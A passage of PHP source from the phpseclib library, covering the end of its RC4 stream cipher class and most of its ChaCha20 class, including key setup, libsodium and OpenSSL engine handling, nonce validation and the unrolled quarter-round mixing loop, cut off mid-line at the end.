/** * Encrypts a block * * @param string $in */ protected function encryptBlock($in) { // RC4 does not utilize this method } /** * Decrypts a block * * @param string $in */ protected function decryptBlock($in) { // RC4 does not utilize this method } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { $key = $this->key; $keyLength = strlen($key); $keyStream = range(0, 255); $j = 0; for ($i = 0; $i < 256; $i++) { $j = ($j + $keyStream[$i] + ord($key[$i % $keyLength])) & 255; $temp = $keyStream[$i]; $keyStream[$i] = $keyStream[$j]; $keyStream[$j] = $temp; } $this->stream = []; $this->stream[self::DECRYPT] = $this->stream[self::ENCRYPT] = [ 0, // index $i 0, // index $j $keyStream ]; } /** * Encrypts or decrypts a message. * * @see self::encrypt() * @see self::decrypt() * @param string $text * @param int $mode * @return string $text */ private function crypt($text, $mode) { if ($this->changed) { $this->setup(); } $stream = &$this->stream[$mode]; if ($this->continuousBuffer) { $i = &$stream[0]; $j = &$stream[1]; $keyStream = &$stream[2]; } else { $i = $stream[0]; $j = $stream[1]; $keyStream = $stream[2]; } $len = strlen($text); for ($k = 0; $k < $len; ++$k) { $i = ($i + 1) & 255; $ksi = $keyStream[$i]; $j = ($j + $ksi) & 255; $ksj = $keyStream[$j]; $keyStream[$i] = $ksj; $keyStream[$j] = $ksi; $text[$k] = $text[$k] ^ chr($keyStream[($ksj + $ksi) & 255]); } return $text; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/ChaCha20.php000064400000111001147600400120021026 0ustar00 * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Exception\BadDecryptionException; use phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of ChaCha20. * * @author Jim Wigginton */ class ChaCha20 extends Salsa20 { /** * The OpenSSL specific name of the cipher * * @var string */ protected $cipher_name_openssl = 'chacha20'; /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_LIBSODIUM: // PHP 7.2.0 (30 Nov 2017) added support for libsodium // we could probably make it so that if $this->counter == 0 then the first block would be done with either OpenSSL // or PHP and then subsequent blocks would then be done with libsodium but idk - it's not a high priority atm // we could also make it so that if $this->counter == 0 and $this->continuousBuffer then do the first string // with libsodium and subsequent strings with openssl or pure-PHP but again not a high priority return function_exists('sodium_crypto_aead_chacha20poly1305_ietf_encrypt') && $this->key_length == 32 && (($this->usePoly1305 && !isset($this->poly1305Key) && $this->counter == 0) || $this->counter == 1) && !$this->continuousBuffer; case self::ENGINE_OPENSSL: // OpenSSL 1.1.0 (released 25 Aug 2016) added support for chacha20. // PHP didn't support OpenSSL 1.1.0 until 7.0.19 (11 May 2017) // if you attempt to provide openssl with a 128 bit key (as opposed to a 256 bit key) openssl will null // pad the key to 256 bits and still use the expansion constant for 256-bit keys. the fact that // openssl treats the IV as both the counter and nonce, however, let's us use openssl in continuous mode // whereas libsodium does not if ($this->key_length != 32) { return false; } } return parent::isValidEngineHelper($engine); } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { $this->setup(); if ($this->engine == self::ENGINE_LIBSODIUM) { return $this->encrypt_with_libsodium($plaintext); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { $this->setup(); if ($this->engine == self::ENGINE_LIBSODIUM) { return $this->decrypt_with_libsodium($ciphertext); } return parent::decrypt($ciphertext); } /** * Encrypts a message with libsodium * * @see self::encrypt() * @param string $plaintext * @return string $text */ private function encrypt_with_libsodium($plaintext) { $params = [$plaintext, $this->aad, $this->nonce, $this->key]; $ciphertext = strlen($this->nonce) == 8 ? sodium_crypto_aead_chacha20poly1305_encrypt(...$params) : sodium_crypto_aead_chacha20poly1305_ietf_encrypt(...$params); if (!$this->usePoly1305) { return substr($ciphertext, 0, strlen($plaintext)); } $newciphertext = substr($ciphertext, 0, strlen($plaintext)); $this->newtag = $this->usingGeneratedPoly1305Key && strlen($this->nonce) == 12 ? substr($ciphertext, strlen($plaintext)) : $this->poly1305($newciphertext); return $newciphertext; } /** * Decrypts a message with libsodium * * @see self::decrypt() * @param string $ciphertext * @return string $text */ private function decrypt_with_libsodium($ciphertext) { $params = [$ciphertext, $this->aad, $this->nonce, $this->key]; if (isset($this->poly1305Key)) { if ($this->oldtag === false) { throw new InsufficientSetupException('Authentication Tag has not been set'); } if ($this->usingGeneratedPoly1305Key && strlen($this->nonce) == 12) { $plaintext = sodium_crypto_aead_chacha20poly1305_ietf_decrypt(...$params); $this->oldtag = false; if ($plaintext === false) { throw new BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } return $plaintext; } $newtag = $this->poly1305($ciphertext); if ($this->oldtag != substr($newtag, 0, strlen($this->oldtag))) { $this->oldtag = false; throw new BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } $this->oldtag = false; } $plaintext = strlen($this->nonce) == 8 ? sodium_crypto_aead_chacha20poly1305_encrypt(...$params) : sodium_crypto_aead_chacha20poly1305_ietf_encrypt(...$params); return substr($plaintext, 0, strlen($ciphertext)); } /** * Sets the nonce. * * @param string $nonce */ public function setNonce($nonce) { if (!is_string($nonce)) { throw new \UnexpectedValueException('The nonce should be a string'); } /* from https://tools.ietf.org/html/rfc7539#page-7 "Note also that the original ChaCha had a 64-bit nonce and 64-bit block count. We have modified this here to be more consistent with recommendations in Section 3.2 of [RFC5116]." */ switch (strlen($nonce)) { case 8: // 64 bits case 12: // 96 bits break; default: throw new \LengthException('Nonce of size ' . strlen($nonce) . ' not supported by this algorithm. Only 64-bit nonces or 96-bit nonces are supported'); } $this->nonce = $nonce; $this->changed = true; $this->setEngine(); } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setNonce() * * - First run of encrypt() / decrypt() with no init-settings * * @see self::setKey() * @see self::setNonce() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } $this->enbuffer = $this->debuffer = ['ciphertext' => '', 'counter' => $this->counter]; $this->changed = $this->nonIVChanged = false; if ($this->nonce === false) { throw new InsufficientSetupException('No nonce has been defined'); } if ($this->key === false) { throw new InsufficientSetupException('No key has been defined'); } if ($this->usePoly1305 && !isset($this->poly1305Key)) { $this->usingGeneratedPoly1305Key = true; if ($this->engine == self::ENGINE_LIBSODIUM) { return; } $this->createPoly1305Key(); } $key = $this->key; if (strlen($key) == 16) { $constant = 'expand 16-byte k'; $key .= $key; } else { $constant = 'expand 32-byte k'; } $this->p1 = $constant . $key; $this->p2 = $this->nonce; if (strlen($this->nonce) == 8) { $this->p2 = "\0\0\0\0" . $this->p2; } } /** * The quarterround function * * @param int $a * @param int $b * @param int $c * @param int $d */ protected static function quarterRound(&$a, &$b, &$c, &$d) { // in https://datatracker.ietf.org/doc/html/rfc7539#section-2.1 the addition, // xor'ing and rotation are all on the same line so i'm keeping it on the same // line here as well // @codingStandardsIgnoreStart $a+= $b; $d = self::leftRotate(intval($d) ^ intval($a), 16); $c+= $d; $b = self::leftRotate(intval($b) ^ intval($c), 12); $a+= $b; $d = self::leftRotate(intval($d) ^ intval($a), 8); $c+= $d; $b = self::leftRotate(intval($b) ^ intval($c), 7); // @codingStandardsIgnoreEnd } /** * The doubleround function * * @param int $x0 (by reference) * @param int $x1 (by reference) * @param int $x2 (by reference) * @param int $x3 (by reference) * @param int $x4 (by reference) * @param int $x5 (by reference) * @param int $x6 (by reference) * @param int $x7 (by reference) * @param int $x8 (by reference) * @param int $x9 (by reference) * @param int $x10 (by reference) * @param int $x11 (by reference) * @param int $x12 (by reference) * @param int $x13 (by reference) * @param int $x14 (by reference) * @param int $x15 (by reference) */ protected static function doubleRound(&$x0, &$x1, &$x2, &$x3, &$x4, &$x5, &$x6, &$x7, &$x8, &$x9, &$x10, &$x11, &$x12, &$x13, &$x14, &$x15) { // columnRound static::quarterRound($x0, $x4, $x8, $x12); static::quarterRound($x1, $x5, $x9, $x13); static::quarterRound($x2, $x6, $x10, $x14); static::quarterRound($x3, $x7, $x11, $x15); // rowRound static::quarterRound($x0, $x5, $x10, $x15); static::quarterRound($x1, $x6, $x11, $x12); static::quarterRound($x2, $x7, $x8, $x13); static::quarterRound($x3, $x4, $x9, $x14); } /** * The Salsa20 hash function function * * On my laptop this loop unrolled / function dereferenced version of parent::salsa20 encrypts 1mb of text in * 0.65s vs the 0.85s that it takes with the parent method. * * If we were free to assume that the host OS would always be 64-bits then the if condition in leftRotate could * be eliminated and we could knock this done to 0.60s. * * For comparison purposes, RC4 takes 0.16s and AES in CTR mode with the Eval engine takes 0.48s. * AES in CTR mode with the PHP engine takes 1.19s. Salsa20 / ChaCha20 do not benefit as much from the Eval * approach due to the fact that there are a lot less variables to de-reference, fewer loops to unroll, etc * * @param string $x */ protected static function salsa20($x) { list(, $x0, $x1, $x2, $x3, $x4, $x5, $x6, $x7, $x8, $x9, $x10, $x11, $x12, $x13, $x14, $x15) = unpack('V*', $x); $z0 = $x0; $z1 = $x1; $z2 = $x2; $z3 = $x3; $z4 = $x4; $z5 = $x5; $z6 = $x6; $z7 = $x7; $z8 = $x8; $z9 = $x9; $z10 = $x10; $z11 = $x11; $z12 = $x12; $z13 = $x13; $z14 = $x14; $z15 = $x15; // @codingStandardsIgnoreStart // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) 